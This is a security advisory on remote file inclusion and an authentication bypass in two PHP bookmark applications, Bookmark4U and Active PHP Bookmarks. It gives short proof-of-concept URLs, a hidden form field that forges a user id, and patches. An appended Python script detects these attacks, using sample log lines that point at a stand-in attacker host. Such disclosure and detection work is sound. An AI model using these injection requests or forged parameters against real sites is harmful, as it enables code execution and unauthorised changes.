Program: Bookmark4U V.1.8.3
Website: http://bookmark4u.sourceforge.net/
Vendor status: Informed (30 days ago)
Problem: Source injection

Files affected:
  inc/dbase.php
  inc/config.php
  inc/common.load.php (?)

Proof of concept:
  dbase.php?prefix=http://...

Solution:
The security of the inc/ directory relies on Apache authentication
configured in inc/.htaccess (deny from all). Some default
configurations (Debian woody, for example) have .htaccess overrides
disabled, so the files in inc/ can be requested directly. Edit your
httpd.conf and change the AllowOverride option from None to
AuthConfig, then restart Apache.

Note: INSTALL.txt says nothing about this.

----------------------------------------------------------------------

Program: Active PHP Bookmarks (APB) V1.1.01
Website: http://www.lbstone.com/apb/
Vendor status: Informed (30 days ago)
Problem:
  1) Source injection
  2) Bookmarks and groups can be added without user registration

1) Source injection

Files affected (File:Line:Code):
  templates/head.php:14:include($APB_SETTINGS['template_path'] . "head_design.php");
  apb_common.php:41:include_once($APB_SETTINGS['apb_path'].'apb_bookmark_class.php');
  apb_common.php:42:include_once($APB_SETTINGS['apb_path'].'apb_group_class.php');
  apb_common.php:43:include_once($APB_SETTINGS['apb_path'].'apb_view_class.php');
  apb_common.php:506:include($APB_SETTINGS['template_path'] . 'head.php');
  apb_common.php:520:include($APB_SETTINGS['template_path'] . 'foot.php');
  apb_view_class.php:48:include($APB_SETTINGS['template_path'] . $this->outer_file);

Proof of concept:
  head.php?APB_SETTINGS%5Btemplate_path%5D=http://...

Solution:
Add the following lines to the beginning of templates/head.php,
apb_common.php and apb_view_class.php (in apb_view_class.php at line
47, before the include in the output function), so the include paths
are set by the script itself before any include runs:

  // Change apb_dir_name if your installation directory differs
  $APB_SETTINGS['apb_dir_name'] = 'bookmarks/';
  // $_SERVER['DOCUMENT_ROOT'] is used instead of the register_globals
  // variable $DOCUMENT_ROOT so the value cannot come from the request
  $APB_SETTINGS['apb_path'] = $_SERVER['DOCUMENT_ROOT'] . '/' . $APB_SETTINGS['apb_dir_name'];
  $APB_SETTINGS['template_path'] = $APB_SETTINGS['apb_path'] . 'templates/';

2) Bookmarks and groups can be added without user registration

Files affected:
  add_bookmark.php

Description:
The variable $APB_SETTINGS['auth_user_id'] is never defined by the
script, so it can be passed through GET or POST and the form is
executed with any user id.

Proof of concept:
Load the form with ?APB_SETTINGS%5Bauth_user_id%5D=1, then submit the
resulting form with the same variable, for example by changing the
action property of the form tag and adding the following input:

  <input type="hidden" name="APB_SETTINGS%5Bauth_user_id%5D" value="1">

Solution:
The easiest (and dirty) solution: add the following lines to the
beginning of add_bookmark.php and replace both "xxxxxx" values with
your username and password:

  // The original used the register_globals variables $PHP_AUTH_USER and
  // $PHP_AUTH_PW; $_SERVER is read here so the values cannot be supplied
  // as request parameters, and isset() avoids notices on the first request
  $auth_user = isset($_SERVER['PHP_AUTH_USER']) ? $_SERVER['PHP_AUTH_USER'] : '';
  $auth_pw   = isset($_SERVER['PHP_AUTH_PW'])   ? $_SERVER['PHP_AUTH_PW']   : '';
  if ($auth_user !== 'xxxxxx' || $auth_pw !== 'xxxxxx') {
      header('WWW-Authenticate: Basic realm="Authorization Required"');
      header('HTTP/1.0 401 Unauthorized');
      echo 'Authorization Required.';
      exit;
  }

----------------------------------------------------------------------

itzhak <itzhak@2500hz.net>
2500Hz Labs <www.2500hz.net>

Greetings: aViNash, pantarhei, neuronal and Asejua
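As an added example (not part of the advisory or of either project), the following Python script scans Apache access-log lines for the request shapes shown in the two proofs of concept above: a URL supplied in Bookmark4U's prefix parameter, or a client-supplied APB_SETTINGS[...] entry. The log lines, addresses and hostnames are constructed sample data.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-log lines (sample data, not from any real server).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2002:10:01:02 +0000] "GET /bookmarks/inc/dbase.php?prefix=http://attacker.invalid/x.txt HTTP/1.0" 200 512
10.0.0.6 - - [12/Mar/2002:10:02:10 +0000] "GET /bookmarks/templates/head.php?APB_SETTINGS%5Btemplate_path%5D=http://attacker.invalid/ HTTP/1.0" 200 300
10.0.0.7 - - [12/Mar/2002:10:03:44 +0000] "GET /bookmarks/add_bookmark.php?APB_SETTINGS%5Bauth_user_id%5D=1 HTTP/1.0" 200 2048
10.0.0.8 - - [12/Mar/2002:10:04:00 +0000] "GET /bookmarks/index.php?group=3 HTTP/1.0" 200 4096
10.0.0.9 - - [12/Mar/2002:10:05:00 +0000] "GET /bookmarks/inc/dbase.php HTTP/1.0" 403 210
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

# Query parameters the advisory shows being injected; neither application
# expects any of them from the client, so every occurrence is worth a look.
WATCHED = {
    "prefix": "Bookmark4U inc/dbase.php include path",
    "apb_settings[template_path]": "APB template include path",
    "apb_settings[apb_path]": "APB class include path",
    "apb_settings[auth_user_id]": "APB user id supplied by client",
}
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

def classify_request(target):
    """Return (param, value, reason) triples for one request target."""
    findings = []
    # parse_qs decodes %5B/%5D, so keys come back as APB_SETTINGS[...]
    for key, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        key = key.lower()
        if key not in WATCHED:
            continue
        for value in values:
            reason = WATCHED[key]
            if REMOTE_RE.match(value):
                reason = "remote file inclusion attempt: " + reason
            findings.append((key, value, reason))
    return findings

def scan_log(text):
    """Return (ip, status, param, value, reason) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        for key, value, reason in classify_request(m["target"]):
            hits.append((m["ip"], int(m["status"]), key, value, reason))
    return hits
```

POST bodies are not recorded in the access log, so the form-submission half of the second proof of concept has to be caught in the application itself (or by a proxy that logs request bodies), not by this scan.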